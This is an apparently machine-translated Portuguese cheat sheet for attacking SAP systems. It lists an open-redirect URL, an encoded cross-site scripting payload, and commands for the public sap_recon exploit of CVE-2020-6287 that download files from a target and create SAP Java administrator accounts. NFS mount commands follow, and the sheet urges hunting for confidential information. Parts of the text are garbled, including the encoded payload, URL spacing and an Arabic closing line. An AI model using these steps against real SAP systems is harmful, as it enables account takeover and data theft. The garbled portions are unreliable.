Bismillah
Para conduzir o PENTEST, você deve implantar o sistema SAP em sua rede
https: // host/SAP/public/bc/icf/logoff? Redirecturl = malicioso
http: // host: porta/startpage
http: // host: porta/sap/public/info
http: // host: porta/sap/public/info
Procure/sapirexthelp https: // localhost/sapirexthelp
https: // host/sapirexthelp/aleatória/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d 26%23%39%37%26%23%31 %30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%23%23%78%36 %33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65 26 26 %23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29 3e.asp
Sistema de informação SAP 1.0 Upload do shell
CVE-2022-22536 (ICMAD SAP)
SAP Recon Vulnerabilidade (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/sap_recon
Baixe o arquivo zip
python reconh.py -h 172.16.30.8 -f /1111.zip
Crie o usuário do SAP Java
python reconh.py -h 172.16.30.8 -u
Crie o usuário do SAP Java Administrator
python reconh.py -h 172.16.30.8 -a
sslscan
nfs-ls nfs: // host/montagem
mkdir mnt && mount -t nfs host:/mount ./mnt
Boa sorte pesquisando informações confidenciais
Estou procurando uma máquina ou contêiner virtual SAP para fazer simulação PENTEST, se você tiver informações, por favor, me dm @linkedin)
Compartilhar é atencioso
كماقال صلى الله عليه وسلم: "خير الناه أنفuo للناntos"